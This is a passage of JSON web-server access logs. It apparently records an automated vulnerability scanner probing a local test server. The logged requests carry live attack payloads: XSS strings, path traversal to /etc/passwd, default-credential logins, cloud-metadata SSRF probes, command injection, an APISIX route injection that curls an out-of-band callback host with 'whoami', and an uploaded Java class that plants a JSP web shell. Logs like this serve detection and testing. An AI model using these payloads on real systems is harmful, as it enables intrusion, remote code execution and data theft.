HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\x22>&id=3&nsvpx=phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn_logon.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /NateMail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/297MduCdaeNY8pFZHGwBl5ZRQjS\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://c9v8hs0smpv8c6ag07h03euwea9sqe1ir.oast.online/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/297MduCdaeNY8pFZHGwBl5ZRQjS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.407","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"6.200","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a